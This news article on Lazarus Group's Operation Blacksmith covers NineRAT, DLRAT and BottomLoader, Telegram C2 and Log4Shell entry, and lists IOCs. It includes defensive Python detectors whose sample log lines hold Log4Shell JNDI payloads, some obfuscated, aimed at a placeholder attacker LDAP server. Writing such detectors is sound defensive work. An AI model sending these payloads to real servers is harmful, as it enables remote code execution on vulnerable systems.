Tuesday, April 16, 2024

Lazarus Group’s Operation Blacksmith Attacking Organizations Worldwide

The Lazarus Group is a notorious North Korean state-sponsored hacking organization known for:

Cyber espionage

Financial Theft

Destructive attacks

They have been implicated in high-profile incidents, including the 2014 Sony Pictures hack and the 2017 WannaCry ransomware outbreak.

Cybersecurity researchers at Cisco Talos recently found Lazarus Group’s “Operation Blacksmith” using new DLang-based malware to attack organizations across the globe.

Operation Blacksmith exploits Log4Shell (CVE-2021-44228) for initial access and deploys a new DLang-based RAT that uses Telegram for C2 communication.

Three DLang-based malware families were discovered:

Telegram-based RAT “NineRAT” 

Non-Telegram RAT “DLRAT” 

Downloader “BottomLoader”

Technical analysis

NineRAT uses Telegram as its C2 channel, both for receiving commands and for transferring files. Routing C2 through Telegram's bot API lets the traffic blend in with legitimate HTTPS traffic to a well-known service, which is the stealth Lazarus gains from it.

It comprises a dropper with two embedded components:

An instrumentor, nsIookup.exe (spelled with a capital "I" in place of the "l" of the legitimate Windows nslookup.exe, so it passes a casual glance at a process list)

A second component that establishes persistence (executed by the instrumentor)
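The instrumentor's file name is a lookalike of nslookup.exe, which a plain string match against known-good names will not catch. The following is an added example, not code from the article or from Cisco Talos, that folds visually confusable characters (capital I, digit 1, digit 0 and so on) before comparing a process name against an allow-list. The allow-list and the process list are constructed for the example.

```python
# Added example; not code from the article or from Cisco Talos. Flags process names that
# masquerade as legitimate Windows binaries by swapping visually confusable characters,
# the way NineRAT's "nsIookup.exe" (capital I) imitates nslookup.exe.
import unicodedata

# Constructed allow-list of legitimate binary names; a real deployment would load a
# known-good inventory instead.
LEGIT_BINARIES = {
    "nslookup.exe", "svchost.exe", "lsass.exe", "explorer.exe", "rundll32.exe",
}

# Single characters that render alike in common UI fonts, mapped to one canonical form.
# Capital I, digit 1 and pipe all pass for lowercase l; digit 0 for o; 5 and $ for s.
CONFUSABLES = {"I": "l", "1": "l", "|": "l", "0": "o", "O": "o", "5": "s", "$": "s"}


def skeleton(name: str) -> str:
    """Collapse a file name so that lookalikes compare equal.

    Fullwidth/accented forms are folded to ASCII first (e.g. U+FF4E -> 'n'),
    then each confusable character is replaced by its canonical letter and the
    rest is lowercased; finally the two-letter sequence 'rn' is folded to 'm'.
    """
    folded = unicodedata.normalize("NFKD", name)
    folded = "".join(ch for ch in folded if not unicodedata.combining(ch))
    mapped = "".join(CONFUSABLES.get(ch, ch.lower()) for ch in folded)
    return mapped.replace("rn", "m")


# Skeletons of the allow-list, computed once.
LEGIT_SKELETONS = {skeleton(n): n for n in LEGIT_BINARIES}


def masquerade_check(process_name: str):
    """Return (verdict, legit_name): verdict is 'legit', 'lookalike' or 'unknown'.

    Windows file names are case-insensitive, so an exact match is tested on the
    lowercased name before any confusable folding happens.
    """
    lowered = process_name.lower()
    if lowered in LEGIT_BINARIES:
        return "legit", lowered
    legit = LEGIT_SKELETONS.get(skeleton(process_name))
    if legit is not None:
        return "lookalike", legit
    return "unknown", None


def scan(processes):
    """Return [(pid, name, imitated_binary)] for every lookalike in a process list."""
    hits = []
    for pid, name in processes:
        verdict, legit = masquerade_check(name)
        if verdict == "lookalike":
            hits.append((pid, name, legit))
    return hits


# Constructed process list (pid, image name); not taken from a real host.
PROCESSES = [
    (812, "svchost.exe"),
    (4120, "nsIookup.exe"),   # capital I, as in the NineRAT instrumentor
    (5030, "Isass.exe"),      # capital I for l
    (6010, "notepad.exe"),
]

if __name__ == "__main__":
    for pid, name, legit in scan(PROCESSES):
        print(f"pid {pid}: {name!r} looks like {legit}")
```

The skeleton comparison is deliberately aggressive: it is meant to surface candidates for a human to check, not to block processes, and a legitimate binary running from an unusual path still needs a separate check on the image path.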

NineRAT is the primary means of interacting with infected hosts, but it coexists with previously deployed tools such as HazyLoad for redundancy: Lazarus keeps persistent access by leaving multiple, overlapping backdoors on a compromised system.

Following the Telegram C2 channels led to the discovery of a public bot, “[at]StudyJ001Bot,” which was later replaced by bots owned by Lazarus. Despite the switch, older NineRAT samples still use the open channels, the report reads.

Andariel, the Lazarus sub-group Talos ties to this activity, has been using NineRAT since 2022. The malware employs two Telegram API tokens, one of them publicly listed, and interacts with Telegram through DLang-based libraries.

Besides this, NineRAT verifies that its token authenticates and handles file upload and download through Telegram bot API methods. It can also uninstall itself from the system by way of a BAT file.
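A RAT that uses the Telegram bot API leaves a distinctive footprint in web-proxy logs: calls to api.telegram.org with a bot token in the URL path, from a host that has no reason to talk to Telegram. The following is an added example, not code from the article or from Cisco Talos, that triages such logs per source host. The server subnets, the two bot tokens and the log lines are constructed for the example; the token format and API method names are Telegram's public ones.

```python
# Added example; not code from the article or from Cisco Talos. Triage of web-proxy
# logs for Telegram Bot API use from hosts that have no business talking to Telegram,
# the traffic pattern a NineRAT-style implant produces. The subnets, bot tokens and
# log lines below are constructed for the example.
import re
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

# Bot API calls have the form https://api.telegram.org/bot<TOKEN>/<method>;
# a token is "<numeric bot id>:<35-character secret>".
BOT_CALL = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{35})/(?P<method>[A-Za-z]+)"
)

# What each Bot API method means when an implant, rather than a person, is calling it.
METHOD_ROLE = {
    "getMe": "token/authentication check",
    "getUpdates": "poll for operator commands",
    "sendMessage": "beacon or command output",
    "sendDocument": "file upload (exfiltration)",
    "getFile": "file download (payload or tool fetch)",
}
TRANSFER_METHODS = {"sendDocument", "getFile"}

# Constructed: server ranges (e.g. a DMZ hosting VMware Horizon) where Telegram is never expected.
SERVER_NETS = [ip_network("10.20.0.0/16"), ip_network("10.30.0.0/16")]

# Constructed, invalid tokens with the right shape.
TOKEN_A = "6123456789:AAHxB7k2q9LmN4pR8sT1uV6wX0yZ3aC5dE7"
TOKEN_B = "5987654321:AAGqW1e2R3t4Y5u6I7o8P9a0S1d2F3g4H5j"

# Constructed proxy log: "<timestamp> <source ip> <http method> <url>".
SAMPLE_LOG = f"""\
2023-12-11T09:14:02Z 10.20.5.14 GET https://api.telegram.org/bot{TOKEN_A}/getMe
2023-12-11T09:14:03Z 10.20.5.14 GET https://api.telegram.org/bot{TOKEN_A}/getUpdates?offset=0
2023-12-11T09:15:40Z 10.20.5.14 POST https://api.telegram.org/bot{TOKEN_A}/sendDocument
2023-12-11T09:16:11Z 10.20.5.14 GET https://api.telegram.org/bot{TOKEN_B}/getFile?file_id=BQACAgQ
2023-12-11T09:20:00Z 10.30.1.77 GET https://api.telegram.org/bot{TOKEN_B}/getUpdates
2023-12-11T09:21:00Z 10.40.9.2 GET https://web.telegram.org/a/
2023-12-11T09:22:00Z 10.20.5.14 GET https://update.example.com/check
"""


def extract_bot_call(url):
    """Return (token, method) for a Bot API URL, or None for anything else."""
    m = BOT_CALL.search(url)
    return (m.group("token"), m.group("method")) if m else None


def triage(log_text):
    """Group Bot API calls by source host and rate each host."""
    per_host = defaultdict(lambda: {"tokens": set(), "methods": Counter()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        src, url = parts[1], parts[3]
        call = extract_bot_call(url)
        if call is None:
            continue
        token, method = call
        per_host[src]["tokens"].add(token)
        per_host[src]["methods"][method] += 1

    findings = {}
    for host, info in per_host.items():
        on_server = any(ip_address(host) in net for net in SERVER_NETS)
        transfers = sorted(TRANSFER_METHODS & set(info["methods"]))
        reasons = []
        if on_server:
            reasons.append("server-range host using the Telegram Bot API")
        if transfers:
            reasons.append("file transfer methods seen: " + ", ".join(transfers))
        if len(info["tokens"]) > 1:
            reasons.append(f"{len(info['tokens'])} distinct bot tokens from one host")
        findings[host] = {
            "severity": "high" if on_server else "medium",
            "tokens": sorted(info["tokens"]),
            "methods": {m: (n, METHOD_ROLE.get(m, "other")) for m, n in info["methods"].items()},
            "reasons": reasons,
        }
    return findings


if __name__ == "__main__":
    for host, finding in triage(SAMPLE_LOG).items():
        print(host, finding["severity"], "; ".join(finding["reasons"]))
```

The token and method are only visible when the proxy decrypts TLS; without that, the fallback is DNS or SNI for api.telegram.org from server ranges, which loses the per-method detail but still catches a Horizon host that suddenly starts talking to Telegram.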

NineRAT led to the discovery of two more Lazarus DLang-based malware families. BottomLoader is a downloader: it fetches payloads with a PowerShell command and sets up persistence.

Infection chain (Source – Cisco Talos)

DLRAT is both a downloader and a RAT: it executes commands, performs system reconnaissance, and communicates with its C2 using a hardcoded session ID.

For initial access, the attackers exploit CVE-2021-44228 (Log4Shell) on public-facing VMware Horizon servers, then deploy a custom implant after reconnaissance.
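Log4Shell attempts against a public-facing server show up in its access logs as `${jndi:...}` strings, but in practice attackers nest other Log4j lookups (`${lower:j}`, `${::-n}`, `${env:X:-d}`) and URL-encode the payload so that a naive search for `jndi:` misses it. The following is an added example, not code from the article or from Cisco Talos, that collapses those lookups innermost-first, roughly as a vulnerable Log4j would, and extracts the JNDI target. The access-log lines and addresses are constructed for the example.

```python
# Added example; not code from the article or from Cisco Talos. Finds Log4Shell
# (CVE-2021-44228) exploitation attempts in web-server logs by collapsing the nested
# Log4j lookups attackers use to hide the "${jndi:...}" trigger, then pulling out
# the JNDI target. The log lines and addresses below are constructed for the example.
import re
from urllib.parse import unquote

# An innermost lookup: "${" ... "}" with no nested "$", "{" or "}" inside.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def collapse_lookups(text, max_rounds=64):
    """Resolve Log4j 2 lookups innermost-first, roughly as vulnerable Log4j does.

    Returns (collapsed_text, jndi_targets). Handled forms:
      ${lower:X} / ${upper:X}      -> case-changed X
      ${prefix:name:-default}      -> default   (e.g. ${env:NOPE:-j}, ${::-j})
      ${jndi:target}               -> recorded as a hit and replaced by a marker
      anything else (env, sys, date ...) -> empty string, as an unresolved lookup
    max_rounds bounds the work on pathological input.
    """
    targets = []
    for _ in range(max_rounds):
        m = INNER_LOOKUP.search(text)
        if m is None:
            break
        body = m.group(1)
        low = body.lower()
        if low.startswith("jndi:"):
            targets.append(body[len("jndi:"):])
            repl = "<JNDI>"
        elif low.startswith("lower:"):
            repl = body[len("lower:"):].lower()
        elif low.startswith("upper:"):
            repl = body[len("upper:"):].upper()
        elif ":-" in body:
            repl = body.split(":-", 1)[1]
        else:
            repl = ""
        text = text[:m.start()] + repl + text[m.end():]
    return text, targets


def scan_lines(lines):
    """Return [(line_number, [jndi targets])] for lines carrying a JNDI lookup.

    Lines are URL-decoded twice first so percent-encoded and double-encoded
    payloads in the request path are seen too.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        _, targets = collapse_lookups(unquote(unquote(line)))
        if targets:
            hits.append((number, targets))
    return hits


# Constructed access-log lines (203.0.113.9 as the attacker's LDAP server is a documentation address).
SAMPLE_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${::-l}${env:NOPE:-d}ap://203.0.113.9:1389/o}"',
    '198.51.100.7 - - [10/Dec/2021:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:10:00:04 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 200 "-" "curl/7.79"',
    '192.0.2.1 - - [10/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${env:JAVA_HOME}"',
]

if __name__ == "__main__":
    for number, targets in scan_lines(SAMPLE_LINES):
        print(f"line {number}: JNDI lookup -> {targets}")
```

Log-side detection is a backstop, not a fix: a hit tells you the server was targeted, and the outbound LDAP/RMI connection to the extracted target is what confirms exploitation. The durable fix is upgrading Log4j to a version that no longer performs JNDI lookups from log messages; the `log4j2.formatMsgNoLookups` setting alone was later shown to be an incomplete mitigation (CVE-2021-45046).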

IOCs

Hashes

HazyLoad

000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee

NineRAT

534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433

ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4

47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30

f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59

5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541

82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def

BottomLoader

0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f

DLRAT

e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f

9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a

Network IOCs

tech[.]micrsofts[.]com

tech[.]micrsofts[.]tech

27[.]102[.]113[.]93

185[.]29[.]8[.]53

155[.]94[.]208[.]209

162[.]19[.]71[.]175

201[.]77[.]179[.]66

hxxp://27[.]102[.]113[.]93/inet[.]txt

hxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif

hxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php

hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif

hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif

The post Lazarus Group’s Operation Blacksmith Attacking Organizations Worldwide appeared first on Cyber Security News.
